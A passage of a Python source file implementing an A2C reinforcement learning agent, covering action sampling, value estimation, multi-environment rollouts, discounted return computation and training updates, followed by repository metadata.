score = env.ep_score
_, frame, step, learning_rate = self.session.run(
[self.set_scores, self._frames, self._step, self.learning_rate],
{self.score_placeholder: score})
per_frame = (time.time() - self.start_time) / frame
return [
('frame', frame),
('step', step),
('perframe', '{:.6f}'.format(per_frame)),
('lr', '{:.2e}'.format(learning_rate)),
]
def act(self, states):
"""Returns action for each given state"""
preds, values, _ = self.session.run(
[self.softmax_predict, self.value_layer_val, self.update_frames],
{self.input_layer: states})
# noise = np.random.uniform(size=np.shape(preds))
# return np.argmax(preds, axis=1)
# return np.argmax(preds - np.log(-np.log(noise)), axis=1), values
return [np.random.choice(self.action_count, p=pred) for pred in preds], values
def value(self, states):
"""Returns predicted value for each given state"""
vals = self.session.run(self.value_layer, {self.input_layer: states})
return np.squeeze(vals, axis=1)
def fit(self, states, actions, rewards, values):
diff = rewards - values
_, summary, step = self.session.run(
[self.train_op, self.summary_data, self._step],
{self.input_layer: states,
self.target_value: rewards,
self.target_predict: actions,
self.reward_diff: diff})
if step % 50 == 0:
self.writer.add_summary(summary, step)
class RunEnv:
def __init__(self, env):
self.env = env
self.done = False
self.reset = True
self.current_state = None
self.states = []
self.actions = []
self.rewards = []
self.values = []
@property
def active(self):
return not self.reset
def prepare(self):
self.states.clear()
self.actions.clear()
self.rewards.clear()
self.values.clear()
if self.reset:
self.current_state = self.env.reset()
self.reset = False
def async_step(self, action):
if hasattr(self.env, 'async_step'):
self.env.async_step(action)
def step(self, action, value):
self.states.append(self.current_state)
self.actions.append(action)
self.values.append(value)
next_state, reward, self.done, self.reset = self.env.step(action)
# Clip rewards to {-1, 0, 1}
# This is done here so that the EnvRecorder wrapper can still report the
# real score rather than the clipped score.
# reward = np.sign(reward)
self.rewards.append(reward)
self.current_state = next_state
def run(self):
self.start_time = time.time()
run_envs = [self.RunEnv(env) for env in self.envs]
last_save = 0
while self.frames < self.total_steps:
if self.frames - last_save > 100000:
self._save()
last_save = self.frames
all_states = []
all_actions = []
all_rewards = []
all_values = []
for env in run_envs:
env.prepare()
for _ in range(self.t_steps):
envs = [env for env in run_envs if env.active]
if len(envs) == 0:
break
states = [env.current_state for env in envs]
actions, values = self.act(states)
for env, action in zip(envs, actions):
env.async_step(action)
for env, action, value in zip(envs, actions, values):
env.step(action, value)
values = self.value([env.current_state for env in run_envs])
for env, value in zip(run_envs, values):
total_rewards = [0] * len(env.rewards)
if not env.done:
total_rewards[-1] = value
for idx in range(len(env.rewards) - 2, -1, -1):
total_rewards[idx] = env.rewards[idx] + \
self.gamma * total_rewards[idx + 1]
assert len(env.states) == len(env.actions)
assert len(env.states) == len(total_rewards)
all_states += env.states
all_actions += env.actions
all_values += env.values
all_rewards += total_rewards
self.fit(all_states, all_actions, np.array(all_rewards), np.array(all_values))
for env in self.envs:
env.close()
self._save()
| codekitchen/udacity_machine_learning | capstone_project/a2c_agent.py | a2c_agent.py | py | 10,458 | python | en | code | 0 | github-code | 13 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.